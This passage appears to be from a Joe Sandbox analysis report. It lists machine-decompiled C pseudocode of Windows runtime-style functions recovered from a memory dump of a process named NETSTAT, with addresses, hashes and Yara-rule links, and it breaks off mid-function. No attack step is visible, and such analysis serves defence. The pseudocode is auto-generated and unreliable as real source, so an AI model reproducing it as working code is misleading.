C-Code - Quality: 69%

			E02EE69A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x2f5d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L02E76C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E02EE6BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E02EA9980() >= 0) {
							E02E82280(_t56, 0x2f58778);
							_t77 = 1;
							_t68 = 1;
							if( *0x2f58774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x2f58774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E02E6B6F0(0x2e4c338, 0x2e4c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E02EA9520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E02EA95D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E02E7FFB0(_t68, _t77, 0x2f58778);
				}
				_pop(_t78);
				return E02EAB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x02ee69b5
0x02ee69be
0x02ee69c3
0x02ee69c9
0x02ee69cc
0x02ee69d1
0x02ee69d3
0x02ee69de
0x02ee69e1
0x02ee69ea
0x02ee69f6
0x02ee69fe
0x02ee6a13
0x02ee6a14
0x02ee6a15
0x02ee6a16
0x02ee6a1e
0x02ee6a26
0x02ee6a31
0x02ee6a36
0x02ee6a37
0x02ee6a40
0x02ee6a49
0x02ee6a4a
0x02ee6a53
0x02ee6a59
0x02ee6a5d
0x02ee6a5e
0x02ee6a64
0x02ee6a67
0x02ee6a6a
0x02ee6a6d
0x02ee6a70
0x02ee6a77
0x02ee6a7d
0x02ee6a86
0x02ee6a89
0x02ee6a9c
0x02ee6a9f
0x02ee6aa2
0x02ee6aa5
0x02ee6aaf
0x02ee6ab1
0x02ee6ab8
0x02ee6ab9
0x02ee6abb
0x02ee6abe
0x02ee6ac5
0x02ee6ac5
0x02ee6aaf
0x02ee6a40
0x02ee6a26
0x02ee69fe
0x02ee6ace
0x02ee6ad0
0x02ee6ad3
0x02ee6ad8
0x02ee6adf
0x02ee6adf
0x02ee6ae8
0x02ee6aef
0x02ee6aef
0x02ee6af9
0x02ee6b06

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e9c62aabb7083730e074392c2bf897880e41432ab89f9d7fb0da7efe2f26618
Instruction ID: 308cc4a63bcbc4c23506894f56b5a2dff600194c2150a3aabb970cbf0e1481d5
Opcode Fuzzy Hash: 6e9c62aabb7083730e074392c2bf897880e41432ab89f9d7fb0da7efe2f26618
Instruction Fuzzy Hash: 0A4179B1D80208AFDF14DFA5D940BEEBBF9EF48718F14912AE919A7240DB70A945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02E65210, Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E02E65210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E02E652A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E02EA95D0();
							L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E02E7EB70(_t54, 0x2f579a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E02EA95D0();
								L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E02E7EB70(_t54, 0x2f579a0);
						}
						return _t52;
					}
					L5:
					_t33 = E02EAF3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E02E7EB70(_t54, 0x2f579a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E02EA95D0();
							L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x02e65220
0x02e65224
0x02ec0d13
0x02ec0d16
0x02ec0d19
0x02e6522a
0x02e6522a
0x02e6522d
0x02e6522d
0x02e65231
0x02e65235
0x02e65239
0x02ec0d5c
0x02ec0d62
0x00000000
0x00000000
0x02ec0d6a
0x02ec0d7b
0x02ec0d7f
0x02ec0d81
0x02ec0d84
0x02ec0d95
0x02ec0d95
0x02ec0d6c
0x02ec0d71
0x02ec0d71
0x02ec0d9a
0x00000000
0x02e6524a
0x02e6524a
0x02e65250
0x02ec0d24
0x02ec0d35
0x02ec0d39
0x02ec0d3b
0x02ec0d3e
0x02ec0d50
0x02ec0d50
0x02ec0d26
0x02ec0d2b
0x02ec0d2b
0x00000000
0x02ec0d55
0x02e65256
0x02e6525b
0x02e65265
0x02ec0da7
0x02e6526b
0x02e6526e
0x02e65272
0x02ec0db1
0x02ec0db4
0x02ec0dc5
0x02ec0dc5
0x02e65272
0x02e65278
0x02e6527e
0x02e6528a
0x02e6528c
0x02e6528d
0x00000000
0x02e65280
0x02e65282
0x02e65288
0x02e6529f
0x02e65292
0x00000000
0x02e65292
0x00000000
0x02e65288
0x02e6527e

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a5753d1382fdd27172163815b092afcd3e7ab8421a88c7ab4122509f2a3a9d3
Instruction ID: 1ab82bfeaf0e32859b117bf071ab261570a44949f9ddfb590f50b0c650cd61bb
Opcode Fuzzy Hash: 4a5753d1382fdd27172163815b092afcd3e7ab8421a88c7ab4122509f2a3a9d3
Instruction Fuzzy Hash: EB3118312C1610DBC721AB58CD55B767BB6FF017A4F61E61EF85A0B190DB31F801CA90

Uniqueness

Uniqueness Score: -1.00%

Function 02E9A61C, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E02E9A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x2f40220);
				E02EBD08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x2f57b9c; // 0x0
				_t55 = L02E84620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E02EBD0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x2f57b10 =  *0x2f57b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x2f5536c; // 0x3f3fc8
					if( *_t51 != 0x2f55368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x2f55368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x2f5536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E02E9A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x02e9a61c
0x02e9a61e
0x02e9a623
0x02e9a628
0x02e9a62b
0x02e9a62d
0x02e9a648
0x02e9a64a
0x02e9a64f
0x02ed9b44
0x02e9a6ec
0x02e9a6f1
0x02e9a6f1
0x02e9a655
0x02e9a657
0x02e9a65a
0x02e9a65d
0x02e9a662
0x02e9a663
0x02e9a667
0x02e9a668
0x02e9a66d
0x02e9a706
0x02e9a706
0x02ed9bda
0x02ed9be6
0x02ed9beb
0x00000000
0x02ed9beb
0x02e9a679
0x02ed9b7a
0x00000000
0x02ed9b7a
0x02e9a683
0x02e9a6f4
0x02e9a6f7
0x02e9a6f9
0x02e9a6fd
0x02e9a6a0
0x02e9a6a0
0x02e9a6ad
0x02e9a6af
0x02e9a6b4
0x02ed9ba7
0x02ed9bac
0x00000000
0x00000000
0x02ed9bc6
0x02ed9bce
0x02ed9bd1
0x02ed9bd3
0x02ed9bd3
0x00000000
0x02ed9bd1
0x02e9a6bd
0x02e9a6c3
0x02e9a6c6
0x02e9a6d2
0x02e9a701
0x02e9a704
0x00000000
0x02e9a704
0x02e9a6d4
0x02e9a6d6
0x02e9a6d9
0x02e9a6db
0x02e9a6e1
0x02e9a6e6
0x02e9a6e8
0x02e9a6e8
0x02e9a6ea
0x00000000
0x02e9a6ea
0x02e9a688
0x02e9a692
0x02e9a694
0x02e9a699
0x00000000
0x00000000
0x02e9a69d
0x00000000

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 290b24ab9c5bdc32ee7372e29a6c703b33782e1c9d86a1a74028a7b266e67d84
Instruction ID: 56cafded45683e7d08af337d9bdf2a5280591d327bef332e991a8c79b6d632ca
Opcode Fuzzy Hash: 290b24ab9c5bdc32ee7372e29a6c703b33782e1c9d86a1a74028a7b266e67d84
Instruction Fuzzy Hash: 414158B5A80219DFCF09CF58C890B99BBF2BF49308F15D0AAE909AB345C775A941CF54

Uniqueness

Uniqueness Score: -1.00%

Function 02EA3D43, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02EA3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E02E77B60(0, _t61, 0x2e411c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E02E77B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L02E84620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x02ea3d4c
0x02ea3d50
0x02ea3d55
0x02ea3d5e
0x02ede79a
0x00000000
0x02ede79a
0x02ea3d68
0x02ede789
0x02ea3d9d
0x02ea3da3
0x02ea3daf
0x02ea3db5
0x02ea3dbc
0x02ea3dc4
0x02ea3dc9
0x02ea3dce
0x02ede7ae
0x02ede7ae
0x02ea3dde
0x02ea3de2
0x02ea3de7
0x02ea3e0d
0x02ea3e13
0x02ea3e16
0x02ea3e1e
0x02ea3e25
0x02ea3e28
0x00000000
0x00000000
0x02ea3e2a
0x02ea3e2f
0x02ea3e37
0x02ea3e37
0x00000000
0x02ea3e37
0x02ea3e31
0x00000000
0x02ea3e31
0x02ea3e20
0x02ea3e20
0x02ea3e35
0x00000000
0x02ea3de9
0x02ea3de9
0x02ea3de9
0x02ea3dee
0x02ea3dfd
0x02ea3dff
0x02ea3e02
0x02ea3e05
0x02ea3e05
0x00000000
0x02ea3df0
0x02ea3de7
0x02ede78f
0x02ede794
0x02ea3d79
0x02ea3d84
0x02ea3d89
0x02ea3d8e
0x00000000
0x02ede7a4
0x02ea3d96
0x02ea3d9a
0x00000000
0x02ea3d9a
0x00000000
0x02ede794
0x02ea3d6e
0x02ea3d73
0x00000000
0x02ede7b5
0x00000000

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75c730c2ef6d19bdb391927f4d6e44e4036087a5124731771fd96e09570d3e7b
Instruction ID: 6e9f2b8e8ee850506ba2de5fd2773f7f8c7a259f39ecd5a14bb7cc5cd715c368
Opcode Fuzzy Hash: 75c730c2ef6d19bdb391927f4d6e44e4036087a5124731771fd96e09570d3e7b
Instruction Fuzzy Hash: 9931CE35A85615DBC7248F29D865A7BBBF5EF46708B09E0AAF849CF350E730E841C790

Uniqueness

Uniqueness Score: -1.00%

Function 02EE7016, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E02EE7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x2f5d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E02EE6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E02EE6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E02E87D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E02EA9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E02EAB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L02E84620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x02ee7016
0x02ee701e
0x02ee702b
0x02ee7033
0x02ee7037
0x02ee703c
0x02ee703e
0x02ee7041
0x02ee7045
0x02ee704a
0x02ee7050
0x02ee7055
0x02ee705a
0x02ee7062
0x02ee7062
0x02ee705a
0x02ee7064
0x02ee7064
0x02ee7067
0x02ee7071
0x02ee7096
0x02ee709b
0x02ee70a2
0x02ee70a6
0x02ee70a7
0x02ee70ad
0x02ee70b3
0x02ee70b6
0x02ee70bb
0x02ee70c3
0x02ee70c3
0x02ee70c6
0x02ee70cd
0x02ee70dd
0x02ee70e0
0x02ee70e2
0x02ee70e2
0x02ee70ee
0x02ee7101
0x02ee70f0
0x02ee70f9
0x02ee70f9
0x02ee710a
0x02ee710e
0x02ee7112
0x02ee7117
0x02ee7118
0x02ee7118
0x02ee70bb
0x02ee711d
0x02ee7123
0x02ee7131
0x02ee7131
0x02ee7136
0x02ee713d
0x02ee713e
0x02ee713f
0x02ee714a
0x02ee714a
0x02ee7084
0x02ee7088
0x00000000
0x02ee708e
0x02ee708e
0x02ee7092
0x00000000
0x02ee7092

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cd7f7c56c56e0861bdce4f1d1f67f20086dd5f14fc334d1135ab1f3744efc9e
Instruction ID: 5cf9dd0d7ab3e4b003f60843fdb52bbe18d3ae1091f355553bd130a133bc3663
Opcode Fuzzy Hash: 8cd7f7c56c56e0861bdce4f1d1f67f20086dd5f14fc334d1135ab1f3744efc9e
Instruction Fuzzy Hash: 6131C4726447519FC720DF68C940A6AF3E9FFC8704F048A29F89A87694E730E904CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 02E8C182, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E02E8C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E02E87D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E02F38D34(_v8, _t80);
					}
					E02E82280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E02E7FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E02F38833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E02E7FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E02EAB180();
						if(_a4 != 0) {
							E02E82280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E02E8BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E02E8BB2D(_t16, _t15);
						E02E8B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E02E7FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E02E7FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E02E7FFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x02e8c18d
0x02e8c18f
0x02e8c191
0x02e8c19b
0x02e8c1a0
0x02e8c1d4
0x02e8c1de
0x02ed2d6e
0x02e8c1e4
0x02e8c1e4
0x02e8c1e4
0x02e8c1ec
0x02ed2d7d
0x02ed2d7d
0x02e8c1f3
0x02e8c1ff
0x02ed2d88
0x02ed2d8d
0x02ed2d94
0x02ed2d94
0x02ed2d9f
0x02ed2da4
0x02ed2dab
0x02ed2db0
0x02ed2db2
0x02ed2db3
0x02ed2db4
0x02ed2dbc
0x02ed2dc3
0x02ed2dc3
0x02e8c205
0x02e8c205
0x02e8c208
0x02e8c20e
0x02e8c211
0x02e8c216
0x02e8c219
0x02e8c21f
0x02e8c222
0x02e8c22c
0x02e8c234
0x02e8c23a
0x02e8c23f
0x02e8c245
0x02e8c24b
0x02e8c251
0x02e8c25a
0x02e8c276
0x02e8c27d
0x02e8c27d
0x02e8c25c
0x02e8c25c
0x00000000
0x02e8c25e
0x02e8c1a4
0x02e8c1aa
0x02e8c1b3
0x02e8c265
0x02e8c26c
0x02e8c26c
0x00000000

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 307d636bc65c1e691892ef54769284124cec08aca9c581c7184d30bf4727b138
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: AC312471681586AED708FBF4C880BE9F765BF43208F14E15BE55C87241DB386A06CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 02E9A70E, Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E02E9A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x2f57b10; // 0x8
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x2f57b10 = 8;
					 *0x2f57b14 = 0x2f57b0c;
					 *0x2f57b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x9
					E02E9A990(0x2f57b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
